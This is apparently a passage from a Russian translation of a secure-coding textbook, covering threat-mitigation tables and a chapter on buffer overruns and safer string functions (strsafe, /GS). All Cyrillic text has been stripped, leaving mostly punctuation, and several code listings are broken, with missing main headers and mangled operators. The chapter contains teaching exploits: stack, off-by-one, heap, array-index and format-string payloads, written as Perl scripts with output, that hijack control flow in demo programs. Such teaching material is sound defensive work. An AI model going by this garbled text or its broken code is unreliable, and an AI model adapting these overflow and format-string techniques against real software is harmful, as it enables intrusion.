LDAP) ,
, .
,
, NetBIOS \\Northwind, DNS http://www.
northwindtraders.com IP 172.30.121.14. .
DNS,
. , ,
.
IPSec
IPSec ,
. Kerberos
, IPSec
. IPSec
, :
( ). Windows 2000/XP
IPSec.
RADIUS
, Microsoft Internet Authentication Service (IAS),
RADIUS (Remote Administration DialIn User Service)
, RFC 2058.
Windows 2000
Active Directory.

, ,
. ,

. ,
.
Windows , :
(Access control lists, AL);
;
IP;
.
98

Windows NT/2000/XP ACL.
ACL (access control entries, ACE),
,
. , (Blake)
, (Cheryl) ,
.
ACL 6.
, ,
, ,
, .

.
7.
IP-
IP (IP restrictions) IIS,
Web (, )
Web, IP,
DNS.

. , Microsoft SQL Server ,
,
. , COM+, ,
,
. ,
.

, .

, , . ,
10 , ,
, 20.
, .
Windows
:
99
SSL/TLS;
IPSec;
DCOM RPC;
EFS.
SSL/TLS
SSL Netscape 90.
, ,
MAC (Message Authentication Code) . TLS
SSL, IETF (Internet Engineering Task Force).
IPSec
, IPSec ,
MAC .
IPS .
IPSec
, IPSec IP TCP/IP.
DCOM RPC
DCOM RPC ,
. ,
DCOM RPC .
16.
EFS
Windows, 2000, EFS (Encryp
ting File System) ,
NTFS. SSL, TLS, IPSec DCOM/RPC ,
EFS .
,
.
. ,
, !
, .
, 6.
, , MAC-
,
.
.
, , .
( )
, . 128
160 . ,
, .
100
, , ,
.
, . , .

, MAC .
MAC
,
( ). MAC
, .
MAC, , ,
, .
MAC,
; ,
, .
,
, ,
. ,
, , .
Windows API CryptoAPI (Crypto
graphic API) , ,
MAC .
,
8.
, (logging),
,
,

. Windows Windows, Web
IIS , SQL Server Exchange.
! .
,
, ,

.
,

(filtering)
.
101
,
, IP.
(throttling), ,
,
. ,
, .
.
(quality of service)
, .
, .

,
. 7 .
,

. 412 .
4-12. ,

STRIDE
SSL/TLS ( IPSec)

Web
Web

Web.
ACL,
Web

IP.
,
( ,
,
..). ,

TI

SSL/TLS DCOM/RPC

.

. SSL/TLS MAC
.

DCOM/RPC .
IPSec
. . .
102
4-12.
()
STRIDE

.

Web
SSL/TLS,

,
.

.
: Kerberos,

,
. .
! .
,
,
.

. 413 ,
,
. ,
.
,
.
.
4-13.

HTTP

TI
SSL/TLS, WTLS (
TLS)
IPSec

HTTP

.
IPSec
.

.

4-13.
103
()

RPC DCOM

TI

.

TI
PGP (Pretty Good Privacy) PGP

S/MIME (Secure/
. S/MIME
Multipurpose Internet
Mail Extensions)
,

PIN

PIN
PIN!

, ,
IP.

IP

.

S, I

DoS,
,

,

.

,
15 .

cookie
cookie

Web

cookie
MAC
cookie

Web

. . .
104
4-13.
()
,

.
,

,

.

9

,
SSL/TLS,
IPSec Kerberos

HTML

Web

,

Web.

10

.

,
,

.

.

(replay)

T, R, I D

.
!
(
SSL/TLS, IPSec
RPC/DCOM)
.

.

MAC.

4-13.
105
()
T, I D

,

SeDebugPrivilege
S, T, R I,
DE
.

.

Windows NT.
,

,
23
S, T, R I,
DE

,
.
ACL

,

.

,

,

TI

,

,

SSL/TLS IPSec

Web
TI
,

EFS.

.
EFS
,

106
,
. ,
, .

:
. , ,
, .
,
, ,
.
: ,
(, DFD),
STRIDE,
, DREAD,
STRIDE.
, ,
. Microsoft
,
.
I I
5
1:

.
60.
, . (Robert T. Morris) 1988 .
,
, . 2001 .,
, buffer, security
bulletin Microsoft Knowledge Base (http://search.support.microsoft.com/
kb) 20 , , ,
.
BugTraq (http://www.securityfocus.com)

, .
,
. Microsoft (Microsoft
Security Response Center) ,
100 000 , .

.
. ,
.
,
,
.
, ,
5 1:
109
. , . , ,
.
(
C C++,
),
.
Windows (Windows Security Push)
2002 . Microsoft .
.
, ,
.
Strsafe.h.
, BASIC (
Visual Basic, BASIC,
), Java, Perl, C#
,
.
C ++.
++, ,
, ++.
,
. , , . ,
, .
,
buffer overrun. !
, , .
,
, .
.
,
, , : ,
, . ,
: . .
. ,
.
,
,
ANSI Unicode.
, .
,
.

, ,
, ,
.
110
II
, .
,
strcpy.
. , ,
,
(command shell) .
, :
,
. ,
, .
,
. (
, ,
.) .
,
.
/*
StackOverrun.c
,
.
, bar.
*/
#include <stdio.h>
#include <string.h>
void foo(const char* input)
{
char buf[10];
// ? printf?
// 8!).
// , .
printf(" :\n%p\n%p\n%p\n%p\n%p\n% p\n\n");
// "" " #1".
strcpy(buf, input);
printf("%s\n", buf);
printf(" :\n%p\n%p\n%p\n%p\n%p\n%p\n\n");
}
void bar(void)
{
printf("! !\n");
}
int main(int argc, char* argv[])
5 1:
111
{
// , .
printf(" foo = %p\n", foo);
printf(" bar = %p\n", bar);
if (argc != 2)
{
printf(" !\n");
return !1;
}
foo(argv[1]);
return 0;
}
Hello, World!.
foo
bar. %p printf.
, ,
foo, ,
DLL.
bar. foo printf,
,
. , foo
10 .

. ,
,
,
,
malloc.
, .
,
(Release) .
Microsoft Visual C++
,
. , Visual C++
Release. ,
:
C:\Secureco2\Chapter05>StackOverrun.exe Hello
foo = 00401000
bar = 00401045
:
00000000
00000000
7FFDF000
0012FF80
0040108A < , foo.
112
II
00410EDE
Hello
:
6C6C6548 < , "Hello".
0000006F
7FFDF000
0012FF80
0040108A
00410EDE
:
C:\Secureco2\Chapter05>StackOverrun.exe AAAAAAAAAAAAAAAAAAAAAAAA
foo = 00401000
bar = 00401045
:
00000000
00000000
7FFDF000
0012FF80
0040108A
00410ECE
AAAAAAAAAAAAAAAAAAAAAAAA
:
41414141
41414141
41414141
41414141
41414141
41414141
(. 51), , ,
0x41414141,
0x41414141.
. 51.
: ,
Dr. Watson. ASCII
, 0x41 A. ,
. ! , ,
, ,
. .
5 1:
113
,

. ,
, .
:
. ,
. ,
,
, .
,
,
. , ,
. ,
,
exploit.
,
, ,
. !
, !
:
,
. ,

.
, ,

. ,
.
. .
, , 100
.
,
, , ,
. , ,
. ,
, , ,
. , .
,
. .
, ,
.
! .
!
114
II
, .
:
C:\Secureco2\Chapter05>StackOverrun.exe ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
foo = 00401000
bar = 00401045
:
00000000
00000000
7FFDF000
0012FF80
0040108A
00410EBE
ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
:
44434241
48474645
4C4B4A49
504F4E4D
54535251
58575655
,
0x54535251. ASCII, 0x54 T.
:
C:\Secureco2\Chapter05>StacOverrun.exe ABCDEFGHIJKLMNOPQRS
foo = 00401000
bar = 00401045
:
00000000
00000000
7FFDF000
0012FF80
0040108A
00410ECE
ABCDEFGHIJKLMNOPQRS
:
44434241
48474645
4C4B4A49
504F4E4D
00535251
00410ECE
, ! ,
, .
,
5 1:
115
! , , 0x45, 0x10, 0x40

QRC, bar.
? ( 0x10
.) , Hack
Overrun.pl Perl,
:
$arg = "ABCDEFGHIJKLMNOP"."\x45\x10\x40";
$cmd = "StackOverrun ".$arg;
system($cmd);
, :
C:\Secureco2\Chapter05>perl HackOverrun.pl
foo = 00401000
bar = 00401045
:
77FB80DB
77F94E68
7FFDF000
0012FF80
0040108A
00410ECA
ABCDEFGHIJKLMNOPE?@
:
44434241
48474645
4C4B4A49
504F4E4D
00401045
00410ECA
! !
, ? .
16
. ,
, , .
:
( U.S. English) .
,
. ,
. ,
Perl bar.
, Visual C++ .NET
/GC, . (
/GC !) /GC
.
116
II
,
(offbyone error). ,
.
/*
OffByOne.c
*/
#include <stdio.h>
#include <string.h>
void foo(const char* in)
{
char buf[64];
strncpy(buf, in, sizeof(buf));
buf[sizeof(buf)] = '\0'; //!!! !
printf("%s\n", buf);
}
void bar(const char* in)
{
printf("! !\n");
}
{
if(argc != 2)
{
printf(": %s [string]\n", argv[0]);
return !1;
}
printf(" foo %p, bar %p\n", foo, bar);
foo(argv[1]);
return 0;
}
strncpy
sizeof . ,
, . ,
Release .
C/C++ Debug Information
Format , , ,
. Visual Stu
dio .NET, /GC /RTC,
. Linker ()
.
A ,
foo .
, Registers EBP
.
5 1:
117
foo. Memory buf.

strncpy A, ,
buf, EBP.
, null
, EBP
0x0012FF80 0x0012FF00 ( Visual C++ 6.0,
). ,
, 0x0012FF00, 0x41414141!
printf, (step over),
.
Registers , . ret
pop ebp. , EBP
. main,
, , , mov esp,ebp.
EBP ESP, ,
! ret,
0x41414141.
!
, ,
. ,
. , ,
Perl. , :
$arg = "AAAAAAAAAAAAAAAAAAAAAAAAAAAA"."\x40\x10\x40";
$cmd = "off_by_one ".$arg;
system($cmd);
:
foo 00401000, bar 00401040

AAAAAAAAAAAAAAAAAAAAAAAAAAAA@?@
! !
, ,
. , ,
EBP.
, , EBP,
EBP 0xF0 240 ,
,
ESP.
. : Apache mod_ssl offbyone
wuftpd glob. http://online.securityfocus.com/
archive/1/279074 ftp://ftp.wuftpd.org/pub/wuftpdattic/cert.org/CA200133
.
64 Intel Itanium
, . ,

.
118
II

, ,
.
,
, .
w00w00 on Heap Overflows (w00w00 ).
, (Matt Conover), w00w00 Security Development
(WSD), http://www.w00w00.org/files/articles/heap
tut.txt. WSD ,
,
. ,
:
,
, ,
;
,
. , StackGuard,
(Grispin Cowan) , ,
( ,
),

. Visual C++ .NET
.
;

.
,
.
UNIX, ,
Windows . Windows
,
. , w00w00,
BugTraq (http://www.securityfocus.com/archive/1/71598)
Solar Designer:
: BugTraq
: Netscape,
JPEG COM
: 25 2000 , 04:56:42
: Solar Designer <solar@false.com>
: <200007242356.DAA01274@false.com>
[ ]
5 1:
119

malloc (Doug Lea) (
Linux, libc5, glibc),
(locale) 8
( ,
glibc, en_US ru_RU.KOI8R).

: ( ),

. 0 ,
(LSB

).
, ,
free(3)
.
[ ]
, Linux/
x86. .
, Win32
( ntdll!RtlFreeHeap).
http://www.blackhat.com/presentations/winusa02/halvarflake
winsec02.ppt (Halvar Flake)
.
:
/*
HeapOverrun.cpp
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*

*/
class BadStringBuf
{
public:
BadStringBuf(void)
{
m_buf = NULL;
}
120
II
~BadStringBuf(void)
{
if(m_buf != NULL)
free(m_buf);
}
void Init(char* buf)
{
// !
m_buf = buf;
}
void SetString(const char* input)
{
// .
strcpy(m_buf, input);
}
const char* GetString(void)
{
return m_buf;
}
private:
char* m_buf;
};
// BadStringBuf,
// .
BadStringBuf* g_pInput = NULL;
void bar(void)
{
printf("! !\n");
}
void BadFunc(const char* input1, const char* input2)
{
// , ,
// .
char* buf = NULL;
char* buf2;
buf2 = (char*)malloc(16);
g_pInput = new BadStringBuf;
buf = (char*)malloc(16);
// .
g_pInput!>Init(buf2);
5 1:
121
// , , ???
strcpy(buf, input1);
g_pInput!>SetString(input2);
printf(" 1 = %s\n 2 = %s\n",
buf, g_pInput !>GetString());
if(buf != NULL)
free(buf);
}
{
// argv
char arg1[128];
// bar.
// , Intel
// (little endian).
char arg2[4] = {0x0f, 0x10, 0x40, 0};
int offset = 0x40;
// 0xfd ! ,
// .
// 0xfd .
// ,
// .
memset(arg1, 0xfd, offset);
arg1[offset] = (char)0x94;
arg1[offset+1] = (char)0xfe;
arg1[offset+2] = (char)0x12;
arg1[offset+3] = 0;
arg1[offset+4] = 0;
printf(" bar is %p\n", bar);
BadFunc(arg1, arg2);
if(g_pInput != NULL)
delete g_pInput;
return 0;
}
Secureco2\Chapter05. ,
main. ,
, .
. ,
, , BadFunc
.
122
II
, BadFunc ,
, ,
, . C++,
BadStringBuf, .

. ,
malloc, free .
, .
. ,
, ,
( ) ,
.
.
? ,
,
? ,
, , ,
0x40 .
,
!
, bar,
, 0x0012fe94,
,
BadFun. ,
, Visual C++ 6.0,
Release
. ,
0x0012fe94 bar.
: , .
, :
bar 0040100F
1 = ????????????????????????????????????????????????????????o57
2 = 64@
! !
,
Visual C++ !
,

, . Solar Designer
, ,
,
.

. ,
, (, )
, . :
5 1:
123
,
.

,
, , , , .
,
. .

, ,
. ,

? ,
,
, . .
, ,
:
/*
ArrayIndexError.cpp
*/
#include <stdio.h>
#include <stdlib.h>
int* IntVector;
void bar(void)
{
printf("! !\n");
}
void InsertInt(unsigned long index, unsigned long value )
{
// ,
// 64 ,
// unsigned short
// .
printf(" %p\n", &(IntVector[index]));
IntVector[index] = value;
}
bool InitVector(int size)
{
IntVector = (int*)malloc(sizeof(int)*size);
printf(" IntVector: %p\n", IntVector);
124
II
if(IntVector == NULL)
return false;
else
return true;
}
{
unsigned long index, value;
if(argc != 3)
{
printf(": %s [index] [value]\n");
return !1;
}
printf(" bar %p\n", bar);
// 64 <g>.
if(!InitVector(0xffff))
{
printf(" !\n");
return !1;
}
index = atol(argv[1]);
value = atol(argv[2]);
InsertInt(index, value);
return 0;
}
ArrayIndexError.cpp Secureco2\Chapter05.
, ,
,
, .
.
0x00510048, ,
( ), ,
0x0012FF84. ,
, ,
:
= + * sizeof()
, :
0x10012FF84 = 0x00510048 + < > * 4

, 0x0012FF84 0x10012FF84.
, . Calc.exe,
, () 0x3FF07FCF, 1072725967,
5 1:
125
bar (0x00401000) 4198400 .

:
C:\Secureco2\Chapter05>ArrayIndexError.exe 1072725967 4198400

bar 00401000
IntVector 00510048
0012FF84
! !
, ,
.
(truncation error), .
32 0x100000000 0x00000000.
,
, ,
(, ).
,
, ,
. ,
,
,
.

. UNIX (ID) root (
) . ( Windows)
ID (signed integer), ,
, (unsigned
short). (User
ID, UID) 0x10000, ,
0x0000, (root)
, ID 0. ,
.
20.
,
,
. ,

, 20.

,
, .
, ,
. BugTraq:
(http://www.securityfocus.com/archive/1/81565) (Tim Newsham),
(http://www.securityfocus.com/archive/1/66842) (Lamagra
126
II
Argamal). (David Litchfield)

(http://www.nextgenss.com/papers/win32format.doc).
, , ,
,
. ( ,
, C,
printf.) %n
, .
, ,
, . 2000 2001 . UNIX
UNIX ,
.
Windows.
Windows ,
, ,
0x00ffffff , , 0x00120000.
.
0x01000000 0x7fffffff.
: printf
. , printf(<_>)
, printf(%s, <_>) . .
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
typedef void (*ErrFunc)(unsigned long);
void GhastlyError(unsigned long err)
{
printf(" ! ! err = %d\n", err);
// .
// , "" X Window,
// .
// main, .
exit(!1);
}
void RecoverableError(unsigned long err)
{
printf("! , , , ! err = %d\n",
err);
}
void PrintMessage(char* file, unsigned long err)
{
ErrFunc fErrFunc;
5 1:
char buf[512];
if(err == 5)
{
//
fErrFunc = GhastlyError;
}
else
{
fErrFunc = RecoverableError;
}
_snprintf(buf, sizeof(buf)!1, " %s", file);
// , ,
printf("%s", buf);
// , !
printf("\n fErrFunc ! %p\n", &fErrFunc);
// ! ""!
// .
fprintf(stdout, buf);
printf("\n ErrFunc: %p\n", fErrFunc);
fErrFunc(err);
}
void foo(void)
{
printf("! !\n");
}
{
FILE* pFile;
// ,
printf(" foo ! %p\n", foo);
//
pFile = fopen(argv[1], "r");
if(pFile == NULL)
{
PrintMessage(argv[1], errno);
}
else
{
printf(" %s\n", argv[1]);
127
128
II
fclose(pFile);
}
return 0;
}
. ,
, PrintMessage, ,
(
), . PrintMessage
.
printf, exploit
, . , ,
foo.
:
C:\Secureco2\Chapter05>formatstring.exe not_exist
foo ! 00401100
not_exist
fErrFunc ! 0012FF1C
not_exist
ErrFunc: 00401030
! , , , err = 2
:
C:\Secureco2\Chapter05>formatstring.exe %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%
x%x%x%x%x%x%x%x
foo ! 00401100
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
fErrFunc ! 0012FF1C
14534807ffdf000000000000000012fde8077f516b36e6e6143662
0746f20646e69782578257825782578257825782578257825782578257825
ErrFunc: 00401030
! , , , ! err = 2
! , .
7825 %x ,
(little endian).
.
. Perl
, $arg.

$arg:
#
# $arg
# exploit!
# %p 0x67666500
5 1:
129
# , ,
# 0x00656667
$arg = "%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x%x%x%p"."ABC";
# $arg
# $arg = "......%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%p"."ABC";
# ! ErrFunc
# $arg = ".....%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%hn"."\x1c\xff\x12";
# ,
# exploit!
# $arg = "%.4066x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%hn"."\x1c\xff\x12";
$cmd = "formatstring ".$arg;
system($cmd);
ABC %x
%p. ,
%x :
C:\Secureco2\Chapter05>perl test1.pl
foo ! 00401100
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x%x%x%x%x%pABC
fErrFunc ! 0012FF1C
70005c6f00727[]782578257025782500434241ABC
%x, 00434241ABC.
, %p, ABC.
.
exploit, Perl,
ABC \x1c\xff\x12, ,
fErrFunc! , ErrFunc
.
(.)
%x. , 00434241ABC,
,
4 , %x ,
%p , . exploit
:
C:\Secureco2\Chapter05>perl test.pl
foo ! 00401100
130
II
......%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%pABC
fErrFunc ! 0012FF1C
......70005c6f00727[...]8257025782500434241ABC
45
, . ,
, %hn 16 ,
%p. (
h), ABC \x1c\xff\x12 .
, , :
C:\Secureco2\Chapter05>perl test.pl
foo ! 00401100
.....%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%hn? ?
fErrFunc ! 0012FF1C
.....70005c6f00727[]78257825786e682578? ?
ErrFunc: 00400129
, . :
ErrFunc! ,
foo 0x00401100, ErrFunc 0x00400129,
foo 4055 , . , ,
.4066 %x, !
test.pl :
ErrFunc 00401100
! !
,
. 2 , .
,
,
. .
,
, . , ,
.

Unicode ANSI
,
, ANSI Unicode,
Windows. ,
. . Windows NT ( )
ANSI, Unicode, Unicode
,
(wide), , .
5 1:
131

MultiByteToWideChar,
(). :
BOOL GetName(char *szName)

{
WCHAR wszUserName[256];
// ANSI Unicode.
MultiByteToWideChar(CP_ACP, 0,
szName,
!1,
wszUserName,
sizeof(wszUserName));
M
}
? .
MultiByteToWideChar. ,
, lpWideCharStr.
sizeof(wszUserName), 256, ? .
wszUserName Unicode, 256 ,
. sizeof(wszUserName)
512 . , , 512
. wszUserName ,
.
:
MultiByteToWideChar(CP_ACP, 0,
szName,
!1,
wszUserName,
sizeof(wszUserName) /
sizeof(wszUserName[0]));
, :
#define ElementCount(x) (sizeof(x)/sizeof(x[0]))

, Unicode
ANSI: .
MultiByteToWideChar , ,
. , (canoni
calization) , .
! %S,
printf ( ) ,
, ,
Unicode , .
132
II
, Unicode
, IPP (Internet Printing
Protocol), Unicode. MS0123 (http://www.micro
soft.com/technet/security). IPP ISAPI
IIS 5 (Internet Information Services), ;
,
. IIS. :
TCHAR wszComputerName[256];
BOOL GetServerName(EXTENSION_CONTROL_BLOCK *pECB) {
DWORD dwSize = sizeof(wszComputerName);
char
szComputerName[256];
if (pECB!>GetServerVariable (pECB!>ConnID,
"SERVER_NAME",
szComputerName,
&dwSize)) {
// ! .
}
ISAPI GetServerVariable dwSize
szComputerName. dwSize 512, TCHAR ,
Unicode.
, 512 szComputerName,
256 . !
, , ANSI
Unicode, . null,
? (Chris Anley) (http://www.nextgenss.com/papers/
unicodebo.pdf) , . , ,
, , , Intel
.
Unicode
. , ,
, .

!
,
.
(Steve Maguire) Writing
Solid Code ( ) (Microsoft Press, 1993).
.
, ,
. ,
,
, .
, :
5 1:
133
void PrintLine(const char* msg)

{
char buf[255];
sprintf(buf, " %s \n", msg);
M
}
, , ,
, , ,
. , , ,
, .
.
, ,
.
Microsoft.
.
, :
#ifdef _DEBUG
memset(dest, 'A', buflen); //buflen =
#endif

, .
, . ,
,
, .
,
Strsafe.h; .

,

. , ,
.
, lstrcpy, lstrcat lstrcpyn, Windows,
Windows , StrCpy, StrCat
StrCpyN ( Shlwapi.dll). lstr
,
( , LPTSTR),
, ANSI.
, , strsafe.
strcpy
, ,
. :
char *strcpy( char *strDestination, const char *strSource );
134
II
, ,
. null,
.
null, ,
, null.
, .
,
.
strcpy:
/* , strcpy . */
bool HandleInput(const char* input)
{
char buf[80];
if(input == NULL)
{
assert(false);
return false;
}
//
//
//
//
//
//
strlen , null.
: strlen, sizeof size_t,
.
, , size_t
, 20
.
if(strlen(input) < sizeof(buf))

{
// .
strcpy(buf, input);
}
else
{
return false;
}
// .
return true;
}
, ,
null, , , .
, strcpy
. , ,
, .
strcpy. , ,
5 1:
135
, , , .
, strcpy ,
.
:
#define strcpy Unsafe_strcpy

strcpy
. strsafe
, :
#define STRSAFE_NO_DEPRECATE
,
, . (
2001 ., .)

,
. strcpy, , .
strncpy
, . :
char *strncpy( char *strDest, const char *strSource, size_t count );

null ;
.
count. ,
null, .
: ,
null. (, lstrcpyn .)
, ,
, , ,
, . strncpy
, .
.
:
/* , strncpy,
. */
bool HandleInput_Strncpy1(const char* input)
{
char buf[80];
if(input == NULL)
{
assert(false);
return false;
}
136
II
strncpy(buf, input, sizeof(buf) ! 1);

buf[sizeof(buf) ! 1] = '\0';
// .
return true;
}
, input buf
. sizeof.
,
. ,
null . ,
, .
strncpy ,
, .
, ; ,
. . !
, .
, ,
. : ?
, ,
. [ The Tao of Programming (
) (Info Books, 1986) (Jeffrey James),
.] , :
/* strncpy.
, null. */
bool HandleInput_Strncpy2(const char* input)
{
char buf[80];
if(input == NULL)
{
assert(false);
return false;
}
buf[sizeof(buf) ! 1] = '\0';
//
// ! (pragma),
// , , sizeof(buf),
// sizeof(buf) .
strncpy(buf, input, sizeof(buf));
if(buf[sizeof(buf) ! 1] != '\0')
{
5 1:
137
//!
return false;
}
// .
return true;
}
HandleInput_Strncpy2 .
null , strncpy
, sizeof(buf) 1 . ,
, null
, ;
.
sprintf
sprintf strcpy .
. :
int sprintf( char *buffer, const char *format [, argument] ... );

, sprintf ,
. :
/* sprintf */
bool SprintfLogError(int line, unsigned long err, char* msg)
{
char buf[132];
if(msg == NULL)
{
assert(false);
return false;
}
// sprintf???
sprintf(buf, " %d = %d ! %s\n", line, err, msg);
// ,
// .
return true;
}
, ? msg
null, SprintfLogError, , .
21 . err
10 , line 11 . (
, .) ,
msg 89 .
,
. sprintf . ,
, :
138
II
if(sprintf(buf, " %d = %d ! %s\n",

line, err, msg) >= sizeof(buf))
exit(!1);
.

!
, .
, , .
sprintf,
. ( .) (NUL)
, fopen, fprintf ,
fprintf, , .
, .
printf _output, ,
, ,
.
_snprintf
. :
int _snprintf( char *buffer, size_t count, const char *format [, argument] ... );
_sprintf, .
:
/* _snprintf */
bool SnprintfLogError(int line, unsigned long err, char * msg)
{
char buf[132];
if(msg == NULL)
{
assert(false);
return false;
}
// null!
// ?
if(_snprintf(buf, sizeof(buf)!1,
" %d = %d ! %s\n", line, err, msg) < 0)
{
// !
return false;
}
else
{
buf[sizeof(buf)!1] = '\0';
}
// ,
// .
5 1:
139
return true;
}
, , ,
: _snprintf ,
null ,
Microsoft C, .
, C,
ISO C99. _snprint (, ,
), ,
. :
, , ,
, null.
,
, , ;
.
, ,
, null.
null.

. strcpy, strcat ( ),
strncat , ,
, . _snprint
.
_snprint strncpy
strncat. ,
.
Standart Template Library

Standart Template Library (STL) ,
C++. STL
. C
C++. :
/* STL */
#include <string>
using namespace std;
void HandleInput_STL(const char* input)
{
string str1, str2;
// , ,
// null.
str1 = input;
// , null, :
str2.append(input, 132);
// 132 == , .
140
II
// .
// .
printf("%s\n", str2.c_str());
}
! :
string s1, s2;

s1 = "foo";
s2 = "bar"
// s1 "foobar"
s1 += s2;
STL
.
Unicode. CString MFC (Microsoft
Foundation Classes) . , STL

. , STL NULL
. . , inet_ntoa
, .
NULL.
, Microsoft
string .
,
, ,
string.
, string UserInput.
, ,
.
gets fgets

gets. :
char *gets( char *buffer );

, . stdin,
. ,
. fgets
stream C++.
Strsafe.h
Windows (Windows Security Push)
2002 . ,
,
. , (
SDK):
5 1:
141
,
;
null,
;
HRESULT
S_OK;
:
(cch) (cb);
(Ex) ,
.
Strsafe.h Secureco2\Strsafe.
, . ,
. , sizeof msize.
, strncat, ,

. null
, , , ,
. , .
null.
. ,
, strncpy? ,
; ,
.
,
ANSI Unicode , ,
, .
, strsafe :
, . ,
, ;
STRSAFE_NO_CB_FUNCTIONS STRSAFE_NO_CCH_FUNCTIONS.
, ,
, . :
STRSAFE_FILL_BEHIND_NULL ,
. , ,
, ;
STRSAFE_IGNORE_NULLS null .
lstrcpy;
STRSAFE_FILL_ON_FAILURE
;
STRSAFE_NULL_ON_FAILURE
;
STRSAFE_NO_TRUNCATION .
, .
142
II
.
, ,
.
, ( ),
, .
Strsafe.h : STRSAFE_NO_
DEPRECATE, !
:
, ,
.
, .
, , ,
, .
Web http://msdn.microsoft.com/library/enus/winui/winui/windowsuserinter
face/resources/strings/usingstrsafefunctions.asp.

C strsafe:
// CRT!
void UnsafeFunc(LPTSTR szPath,DWORD cchPath) {
TCHAR szCWD[MAX_PATH];
GetCurrentDirectory(ARRAYSIZE(szCWD), szCWD);
strncpy(szPath, szCWD, cchPath);
strncat(szPath, TEXT("\\"), cchPath);
strncat(szPath, TEXT("desktop.ini"),cchPath);
}
// strsafe
bool SaferFunc(LPTSTR szPath,DWORD cchPath) {
TCHAR szCWD[MAX_PATH];
if (GetCurrentDirectory(ARRAYSIZE(szCWD), szCWD) &&
SUCCEEDED(StringCchCopy(szPath, cchPath, szCWD)) &&
SUCCEEDED(StringCchCat(szPath, cchPath, TEXT("\\"))) &&
SUCCEEDED(StringCchCat(szPath, cchPath, TEXT("desktop.ini")))) {
return true;
}
return false;
}

,
strsafe, .
strsafe. ?
5 1:
143
char buff1[N1];
char buff2[N2];
HRESULT h1 = StringCchCat(buff1, ARRAYSIZE(buff1), szData);
StringCchCat.
: buf2 , buf1. :
char buff1[N1];
char buff2[N2];
C.
, strcpy strcat
strncpy strncat , ,
. ?
#define MAXSTRLEN(s) (sizeof(s)/sizeof(s[0]))

if (bstrURL != NULL) {
WCHAR szTmp[MAX_PATH];
LPCWSTR szExtSrc;
LPWSTR szExtDst;
wcsncpy( szTmp, bstrURL, MAXSTRLEN(szTmp) );
szTmp[MAXSTRLEN(szTmp)!1] = 0;
szExtSrc = wcsrchr( bstrURL, '.' );
szExtDst = wcsrchr( szTmp , '.' );
if(szExtDst) {
szExtDst[0] = 0;
if(IsDesktop()) {
wcsncat( szTmp, L"__DESKTOP", MAXSTRLEN(szTmp) );
wcsncat( szTmp, szExtSrc
, MAXSTRLEN(szTmp) );
,
. .
szTmp,
. ,
.
/GS Visual C++ .NET

/GS Visual C++ .NET

EBP, .
/GS .
144
II
/GS , StackGuard,
(Grispin Cowan) http://
www.immunix.org. ,
gcc. /GS StackGuard
, .
. ,
Visual C++ .NET, /GS
? . ,
/GS, StackGuard .

. ( ,
Microsoft Office.)
(stack smashing)
.
/GS.
(pointer subterfuge)
. /GS
, .
(register attack) ,
( EBP), .
.
VTable (VTable hijacking)
, VTable . , /GS
. /GS
, ,
,
. , VTable
.
(exception handler clobbe
ring) ,
. /GS ,
.
(index out of range)
,
. /GS ,
.
(heap overflow)
. /GS .
/GS , ?

, EIP EBP.
, ,
, . ,
, /GS
5 1:
145
( ).
,
.
, ,
. ,
.
. , ,
, (
http://immunix.org/stackguard.html), ,
.
(Greg Hoglund)
NTBUGTRAQ, , /GS. ,
, .
,
, ,
.
,
, , , , .
, ,
. .
,
.
( ), .
,
?

. ,
.
:
grep strcpy *.c

, Perl,
. ,
. , ,
.
, .

. ,
: , , ,
ABS.
. , 2000 .
, , .
/GS. , ,
. , /GS,
, .
146
II
/GS ( ) ,
.

(
).
! /GS , .
, .

. ,
. , ,
, ,
.
,
. :
,
Strsafe.h, . ,
, .
, ,
, , .
Microsoft Windows
.
(Access Control List, ACL).
ACL Windows NT/2000/XP Windows .NET Server
2003.
, ACL
,
.
, .
, ,
, , ACL,
, , ACL,
(Discretionary Access Control List, DACL)
(Access Control Entry, ACE)
.
ACL
,
ACL ,
.
, .
! ACL
. .
148
II
,
, ACL Full Control (
) Everyone (). ,
, , ,
,
. , ,
ACL:
#define MAX_BUFF (64)

#define MY_VALUE "SomeData"
BYTE bBuff[MAX_BUFF];
ZeroMemory(bBuff, MAX_BUFF);
// .
HKEY hKey = NULL;
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"Software\\Northwindtraders",
0,
KEY_READ,
&hKey) == ERROR_SUCCESS) {
// , .
DWORD cbBuff = 0;
if (RegQueryValueEx(hKey,
MY_VALUE,
NULL,
NULL,
NULL,
&cbBuff) == ERROR_SUCCESS) {
// .
MY_VALUE,
NULL,
NULL,
bBuff,
// ! .
}
}
}
if (hKey)
RegCloseKey(hKey);
,
. ,
64 . RegQueryValueEx
, ,
. 64 ,
.
149
? (
). ACL .
Full Control Everyone, ,
,
64 , . ,
Everyone Deny: Full Controll (:
), .
ACL Full Control Administrators Read
() Everyone, ,
( WRITE_DAC).
.
, ,
.
, !
, , ACL,
? ! ,
3. ,
.
:
ACL,
, ,
, .
:
// , .
